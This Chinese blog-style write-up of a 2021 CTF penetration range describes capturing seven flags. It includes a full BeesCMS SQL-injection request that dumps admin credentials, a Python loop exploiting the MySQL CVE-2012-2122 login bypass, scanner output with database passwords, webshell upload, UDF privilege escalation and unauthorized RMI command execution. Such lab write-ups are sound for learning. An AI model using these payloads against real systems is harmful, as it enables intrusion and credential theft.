2021极客谷杯决赛渗透靶场1全解
lazy小远 渗透测试 6889浏览 · 2021-10-27 15:27

比赛情况

2021极客谷杯
Break环节:在Break环节中,参赛选手以攻击者的身份对模拟的企业内网进行内网渗透、内网穿透等操作,获取不同目标服务器的权限。
靶场1一共7个flag,全部ak

靶机信息

地址:1.13.24.8
端口:80

flag6

目录扫描,发现robots.txt

http://1.13.24.8/robots.txt

flag6{4177d24e50af8fedb2e9e385cf6eae9e}

flag7

访问首页,很明显的beescms,搜索相关漏洞发现存在Beescms_v4.0 sql注入漏洞,直接利用exp,注入得后台用户名密码

POST /admin/login.php?action=ck_login HTTP/1.1
Host: 1.13.24.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://1.13.24.8
Connection: close
Referer: http://1.13.24.8/admin/login.php
Cookie: PHPSESSID=7pa2vqf1pn0ckl8eac208ao610
Upgrade-Insecure-Requests: 1

user=admin'a+and+nd+extractvalue(1,concat(0x7e,(seselectlect+admin_password+f+from+rom+bees_admin+limit+0,1),0x7e))#&password=admin123&code=e82b&submit=true&submit.x=66&submit.y=23


bs_admin、ae3700364f2111b2cea75d8e19d2331,md5解密得admin、aabbccdd@123

后台可以直接文件上传getshell,获得flag7


flag7{faf1a4048d9ede1d4ba9b826b3735d5f}

flag1

tmp目录下发现flag

flag1{c5ed891826097543a066a77c8f627040}

flag5

查看ip信息,为172.16.25.10

搞好代理以后,fscan扫描:

172.16.25.10:80 open
172.16.25.1:80 open
172.16.25.16:3306 open
172.16.25.30:7001 open
172.16.25.1:22 open
[] WebTitle:http://172.16.25.30:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan:http://172.16.25.30:7001 [weblogic]
[+] mysql:172.16.25.16:3306:root root123
[
] WebTitle:http://172.16.25.1 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
[*] WebTitle:http://172.16.25.10 code:200 len:141 title:BEES浼佷笟缃戠珯绠$悊绯荤粺_浼佷笟寤虹珯绯荤粺_澶栬锤缃戠珯寤鸿_浼佷笟CMS_PHP钀ラ攢浼佷笟缃戠珯妯
[+] http://172.16.25.30:7001 poc-yaml-weblogic-cve-2020-14750

发现weblogic,可以直接利用cve-2020-2551


flag5{419aba19867bbb8de92efd4c66b12926}

flag3

尝试[+] mysql:172.16.25.16:3306:root root123 登陆MySQL,发现一直提示密码错误

奇怪???难道fscan误报了嘛?

使用goby扫描


发现mysql:172.16.25.16:3306 存在cve-2012-2122,仔细研究这个cve发现:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

因此fscan扫描出来的结果应该正好是尝试爆破mysql密码,在爆破到root123 时产生了溢出,因此判断为登录成功

网上找到exp

#!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -h 172.16.25.16 -u root mysql --password=blah", shell=True).wait()


成功利用,找到flag3

flag3{7b87dd51036fe42f2bd83e1911732a65}

flag4


给了hint,继续使用udf提权

提权成功拿到flag4

flag4{a89b07eebc0f1a5d4de5e4eb78b43ea4}

flag2

搞了半天死活找不到flag2,遂做一次内网全端口扫描,发现172.16.25.20开放了32222端口和40909端口,为rmi服务,未授权访问直接连接可以执行命令,获得flag2

1 条评论
某人
表情
可输入 255
目录